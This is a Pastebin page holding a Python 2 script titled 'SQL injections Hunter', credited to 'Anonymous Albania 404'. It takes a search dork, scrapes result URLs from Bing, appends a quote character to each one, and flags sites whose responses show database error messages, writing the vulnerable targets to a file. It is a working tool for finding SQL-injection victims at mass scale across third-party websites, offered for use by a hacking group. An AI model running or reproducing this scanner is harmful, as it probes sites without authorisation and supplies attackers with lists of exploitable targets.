API tools faq
paste
Advertisement
albania404

SQL injections Hunte By Anonymous Albania 404

albania404
Oct 25th, 2014
179
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.49 KB | None | 0 0
raw download clone embed print report
  1. import urllib
  2. import os
  3. import re
  4. from time import sleep
  5. def sqlihunt(dork , filename ):
  6.  
  7.   # extract Urls from a Bing search engin querying the given dork and test every url in
  8.   # the result is stored in a text file
  9.   file2 =open(filename+'.txt','w')
  10.   start=0
  11.   end=200
  12.   sleep(3)
  13.   print "[info]Getting Websites From Bing ... "
  14.   while start<=end :
  15.     try:
  16.       con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
  17.       #con = con = urllib.urlretrieve('http://www.bing.com/search?q=ip%3A41.203.11.42+%22php%3Fid%3D%22&go=&qs=ds&form=QBLH&filt=all')
  18.       conf = open(con[0])
  19.       readd=conf.read()
  20.       find=re.findall('<h2><a href="(.*?)"',readd)
  21.       start = start+10
  22.       #return find
  23.     except IOError:
  24.       print "[ERROR]network error "
  25.       print "[Info]reconnecting "
  26.       sleep(10)
  27.       print "[Info]retrying "
  28.     try :
  29.       for i in range(len(find)):
  30.                   rez=find[i]+"'"
  31.                   tst = urllib.urlretrieve(rez)
  32.                   tstf = open(tst[0])
  33.                   tstdd= tstf.read()
  34.                   tstfind=re.findall('/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i|You have an error in your SQL syntax|Microsoft VBScript runtime error',tstdd)
  35.                   if(tstfind):
  36.                     print "[SLQi] : "+ rez
  37.                     file2.write(rez + '\n')
  38.                   else:
  39.                     print "[No SQLi ] : " + rez
  40.     except IOError:
  41.       print "[ERROR]No result found"
  42. ##########################################################################################################################
  43.  
  44. print  """
  45.          |==========================================================|
  46.       |==================[Anonymous Albania ]====================|
  47.          |======================  [ 404 ]   ========================|
  48.          |==============[ lordnotfound404@gmail.com ]===============|
  49.          |==========[ https://www.facebook.com/404andreas]==========|
  50.          |==========================================================|
  51.          |      ****      Web Hacking framwork by 404      ***      |
  52.          |==========================================================|
  53.         SQL injections Hunter !!
  54.    """
  55. param1 = raw_input("Dork : ")
  56. param2 = raw_input("Filename :  ")
  57. sqlihunt(param1 , param2 )
  58. print " ./done "
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!